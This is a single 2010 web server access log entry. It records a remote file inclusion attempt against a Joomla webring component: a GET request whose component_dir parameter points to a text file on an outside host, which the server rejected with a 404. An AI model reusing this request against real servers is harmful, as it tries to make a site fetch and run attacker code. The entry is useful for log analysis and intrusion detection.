174.133.171.74 - - [21/Apr/2010:04:37:45 -0500] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
